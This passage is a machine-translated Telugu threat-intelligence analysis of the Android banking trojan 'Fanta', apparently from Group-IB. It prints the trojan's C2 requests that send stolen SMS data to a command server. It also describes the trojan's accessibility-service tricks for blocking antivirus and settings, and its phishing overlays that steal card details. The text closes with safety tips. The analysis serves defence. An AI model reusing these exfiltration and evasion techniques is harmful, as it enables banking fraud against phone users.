POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- డేటాబేస్ కంటెంట్లను అప్లోడ్ చేస్తోంది. ఒక అభ్యర్థనకు ఒక అడ్డు వరుస ప్రసారం చేయబడుతుంది. కింది డేటా సర్వర్కు పంపబడుతుంది:
· కుకీ - సర్వర్ నుండి అందుకున్న కుక్కీలు
· మోడ్ - స్ట్రింగ్ స్థిరాంకం setSaveInboxSms
· బిడ్ - అభ్యర్థనను పంపుతున్నప్పుడు స్వీకరించబడిన సోకిన పరికరం యొక్క id రిజిస్టర్_బోట్
· టెక్స్ట్ — ప్రస్తుత డేటాబేస్ రికార్డులో వచనం (ఫీల్డ్ d టేబుల్ నుండి చిట్టాలు డేటాబేస్లో а)
· సంఖ్య — ప్రస్తుత డేటాబేస్ రికార్డు పేరు (ఫీల్డ్ p టేబుల్ నుండి చిట్టాలు డేటాబేస్లో а)
· sms_మోడ్ — పూర్ణాంకం విలువ (ఫీల్డ్ m టేబుల్ నుండి చిట్టాలు డేటాబేస్లో а)అభ్యర్థన ఇలా కనిపిస్తుంది:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
సర్వర్కు విజయవంతంగా పంపబడితే, పట్టిక నుండి అడ్డు వరుస తొలగించబడుతుంది. సర్వర్ ద్వారా అందించబడిన JSON వస్తువు యొక్క ఉదాహరణ:
{ "response":[], "status":"ok" }
యాక్సెసిబిలిటీ సర్వీస్తో ఇంటరాక్ట్ అవుతోంది
వైకల్యాలున్న వ్యక్తుల కోసం Android పరికరాలను సులభంగా ఉపయోగించడానికి యాక్సెసిబిలిటీ సర్వీస్ అమలు చేయబడింది. చాలా సందర్భాలలో, అప్లికేషన్తో పరస్పర చర్య చేయడానికి భౌతిక పరస్పర చర్య అవసరం. యాక్సెసిబిలిటీ సర్వీస్ వాటిని ప్రోగ్రామాటిక్గా చేయడానికి మిమ్మల్ని అనుమతిస్తుంది. బ్యాంకింగ్ అప్లికేషన్లలో నకిలీ విండోలను సృష్టించడానికి మరియు సిస్టమ్ సెట్టింగ్లు మరియు కొన్ని అప్లికేషన్లను తెరవకుండా వినియోగదారులను నిరోధించడానికి ఫాంటా సేవను ఉపయోగిస్తుంది.
యాక్సెసిబిలిటీ సర్వీస్ యొక్క కార్యాచరణను ఉపయోగించి, ట్రోజన్ సోకిన పరికరం యొక్క స్క్రీన్పై మూలకాలకు మార్పులను పర్యవేక్షిస్తుంది. మునుపు వివరించినట్లుగా, ఫాంటా సెట్టింగ్లు డైలాగ్ బాక్స్లతో కార్యకలాపాలను లాగింగ్ చేయడానికి బాధ్యత వహించే పరామితిని కలిగి ఉంటాయి - డైలాగ్ చదవండి. ఈ పరామితి సెట్ చేయబడితే, ఈవెంట్ను ప్రేరేపించిన ప్యాకేజీ పేరు మరియు వివరణ గురించిన సమాచారం డేటాబేస్కు జోడించబడుతుంది. ఈవెంట్లు ప్రేరేపించబడినప్పుడు ట్రోజన్ క్రింది చర్యలను చేస్తుంది:
- కింది సందర్భాలలో వెనుక మరియు హోమ్ కీలను నొక్కడాన్ని అనుకరిస్తుంది:
· వినియోగదారు తన పరికరాన్ని రీబూట్ చేయాలనుకుంటే
· వినియోగదారు "Avito" అప్లికేషన్ను తొలగించాలనుకుంటే లేదా యాక్సెస్ హక్కులను మార్చాలనుకుంటే
· పేజీలో "Avito" అప్లికేషన్ యొక్క ప్రస్తావన ఉంటే
· Google Play Protect అప్లికేషన్ను తెరిచేటప్పుడు
· యాక్సెసిబిలిటీ సర్వీస్ సెట్టింగ్లతో పేజీలను తెరిచేటప్పుడు
· సిస్టమ్ సెక్యూరిటీ డైలాగ్ బాక్స్ కనిపించినప్పుడు
· "ఇతర యాప్పై గీయండి" సెట్టింగ్లతో పేజీని తెరిచేటప్పుడు
· “అప్లికేషన్స్” పేజీని తెరిచేటప్పుడు, “రికవరీ మరియు రీసెట్”, “డేటా రీసెట్”, “సెట్టింగ్లను రీసెట్ చేయండి”, “డెవలపర్ ప్యానెల్”, “స్పెషల్. అవకాశాలు", "ప్రత్యేక అవకాశాలు", "ప్రత్యేక హక్కులు"
· ఈవెంట్ నిర్దిష్ట అప్లికేషన్ల ద్వారా సృష్టించబడినట్లయితే.అప్లికేషన్ జాబితా
- యాండ్రాయిడ్
- మాస్టర్ లైట్
- క్లీన్ మాస్టర్
- x86 CPU కోసం క్లీన్ మాస్టర్
- Meizu అప్లికేషన్ అనుమతి నిర్వహణ
- MIUI సెక్యూరిటీ
- క్లీన్ మాస్టర్ - యాంటీవైరస్ & కాష్ మరియు గార్బేజ్ క్లీనర్
- తల్లిదండ్రుల నియంత్రణలు మరియు GPS: Kaspersky SafeKids
- కాస్పెర్స్కీ యాంటీవైరస్ యాప్లాక్ & వెబ్ సెక్యూరిటీ బీటా
- వైరస్ క్లీనర్, యాంటీవైరస్, క్లీనర్ (MAX సెక్యూరిటీ)
- మొబైల్ యాంటీవైరస్ సెక్యూరిటీ PRO
- అవాస్ట్ యాంటీవైరస్ & ఉచిత రక్షణ 2019
- మొబైల్ సెక్యూరిటీ MegaFon
- Xperia కోసం AVG రక్షణ
- మొబైల్ భద్రత
- మాల్వేర్బైట్స్ యాంటీవైరస్ & రక్షణ
- Android 2019 కోసం యాంటీవైరస్
- సెక్యూరిటీ మాస్టర్ - యాంటీవైరస్, VPN, AppLock, Booster
- Huawei టాబ్లెట్ సిస్టమ్ మేనేజర్ కోసం AVG యాంటీవైరస్
- Samsung యాక్సెసిబిలిటీ
- Samsung స్మార్ట్ మేనేజర్
- సెక్యూరిటీ మాస్టర్
- స్పీడ్ బూస్టర్
- డా.వెబ్
- డా.వెబ్ సెక్యూరిటీ స్పేస్
- డా.వెబ్ మొబైల్ కంట్రోల్ సెంటర్
- డా.వెబ్ సెక్యూరిటీ స్పేస్ లైఫ్
- డా.వెబ్ మొబైల్ కంట్రోల్ సెంటర్
- యాంటీవైరస్ & మొబైల్ సెక్యూరిటీ
- కాస్పెర్స్కీ ఇంటర్నెట్ భద్రత: యాంటీవైరస్ మరియు రక్షణ
- కాస్పెర్స్కీ బ్యాటరీ లైఫ్: సేవర్ & బూస్టర్
- కాస్పెర్స్కీ ఎండ్పాయింట్ సెక్యూరిటీ - రక్షణ మరియు నిర్వహణ
- AVG యాంటీవైరస్ ఉచిత 2019 - Android కోసం రక్షణ
- యాంటీవైరస్ Android
- నార్టన్ మొబైల్ సెక్యూరిటీ మరియు యాంటీవైరస్
- యాంటీవైరస్, ఫైర్వాల్, VPN, మొబైల్ సెక్యూరిటీ
- మొబైల్ భద్రత: యాంటీవైరస్, VPN, దొంగతనం రక్షణ
- Android కోసం యాంటీవైరస్
- చిన్న నంబర్కు SMS సందేశాన్ని పంపేటప్పుడు అనుమతి అభ్యర్థించబడితే, ఫాంటా చెక్బాక్స్పై క్లిక్ చేయడాన్ని అనుకరిస్తుంది ఎంపిక గుర్తుంచుకోండి మరియు బటన్ పంపు.
- మీరు ట్రోజన్ నుండి అడ్మినిస్ట్రేటర్ హక్కులను తీసివేయడానికి ప్రయత్నించినప్పుడు, అది ఫోన్ స్క్రీన్ను లాక్ చేస్తుంది.
- కొత్త నిర్వాహకులను జోడించడాన్ని నిరోధిస్తుంది.
- యాంటీవైరస్ అప్లికేషన్ ఉంటే dr.web ముప్పును గుర్తించింది, ఫాంటా బటన్ను నొక్కడం అనుకరిస్తుంది పట్టించుకోకుండా.
- అప్లికేషన్ ద్వారా ఈవెంట్ రూపొందించబడితే, ట్రోజన్ బ్యాక్ మరియు హోమ్ బటన్ను నొక్కడాన్ని అనుకరిస్తుంది శామ్సంగ్ పరికర సంరక్షణ.
- దాదాపు 30 రకాల ఇంటర్నెట్ సేవల జాబితా నుండి అప్లికేషన్ ప్రారంభించబడితే, బ్యాంక్ కార్డ్ల గురించిన సమాచారాన్ని నమోదు చేయడానికి ఫాంటా ఫారమ్లతో ఫిషింగ్ విండోలను సృష్టిస్తుంది. వాటిలో: AliExpress, బుకింగ్, Avito, Google Play Market Component, Pandao, Drom Auto, మొదలైనవి.
ఫిషింగ్ రూపాలు
సోకిన పరికరంలో ఏయే అప్లికేషన్లు రన్ అవుతున్నాయో ఫాంటా విశ్లేషిస్తుంది. ఆసక్తి ఉన్న అప్లికేషన్ తెరవబడితే, ట్రోజన్ అన్ని ఇతర వాటి పైన ఫిషింగ్ విండోను ప్రదర్శిస్తుంది, ఇది బ్యాంక్ కార్డ్ సమాచారాన్ని నమోదు చేయడానికి ఒక ఫారమ్. వినియోగదారు తప్పనిసరిగా కింది డేటాను నమోదు చేయాలి:
- కార్డ్ నంబర్
- కార్డ్ గడువు తేదీ
- CVV
- కార్డ్ హోల్డర్ పేరు (అన్ని బ్యాంకులకు కాదు)
అమలవుతున్న అప్లికేషన్పై ఆధారపడి, వివిధ ఫిషింగ్ విండోలు చూపబడతాయి. వాటిలో కొన్ని ఉదాహరణలు క్రింద ఉన్నాయి:
AliExpress:
అవిటో:
కొన్ని ఇతర అనువర్తనాల కోసం, ఉదా. Google Play Market, Aviasales, Pandao, బుకింగ్, Trivago:
ఇది నిజంగా ఎలా ఉంది
అదృష్టవశాత్తూ, వ్యాసం ప్రారంభంలో వివరించిన SMS సందేశాన్ని అందుకున్న వ్యక్తి సైబర్ సెక్యూరిటీ స్పెషలిస్ట్గా మారారు. అందువల్ల, అసలు, నాన్-డైరెక్టర్ వెర్షన్ ఇంతకు ముందు చెప్పిన దానికంటే భిన్నంగా ఉంటుంది: ఒక వ్యక్తి ఒక ఆసక్తికరమైన SMSని అందుకున్నాడు, ఆ తర్వాత అతను దానిని గ్రూప్-IB థ్రెట్ హంటింగ్ ఇంటెలిజెన్స్ బృందానికి ఇచ్చాడు. దాడి ఫలితమే ఈ కథనం. హ్యాపీ ఎండింగ్, సరియైనదా? అయినప్పటికీ, అన్ని కథలు అంత విజయవంతంగా ముగియవు మరియు మీది డబ్బు నష్టంతో దర్శకుడి కట్ లాగా కనిపించదు, చాలా సందర్భాలలో ఈ క్రింది దీర్ఘకాలంగా వివరించిన నియమాలకు కట్టుబడి ఉంటే సరిపోతుంది:
- Google Play కాకుండా ఇతర మూలాల నుండి Android OSతో మొబైల్ పరికరం కోసం అప్లికేషన్లను ఇన్స్టాల్ చేయవద్దు
- అప్లికేషన్ను ఇన్స్టాల్ చేస్తున్నప్పుడు, అప్లికేషన్ అభ్యర్థించిన హక్కులపై ప్రత్యేక శ్రద్ధ వహించండి
- డౌన్లోడ్ చేసిన ఫైల్ల పొడిగింపులపై శ్రద్ధ వహించండి
- క్రమం తప్పకుండా Android OS అప్డేట్లను ఇన్స్టాల్ చేయండి
- అనుమానాస్పద వనరులను సందర్శించవద్దు మరియు అక్కడ నుండి ఫైల్లను డౌన్లోడ్ చేయవద్దు
- SMS సందేశాలలో వచ్చిన లింక్లపై క్లిక్ చేయవద్దు.
మూలం: www.habr.com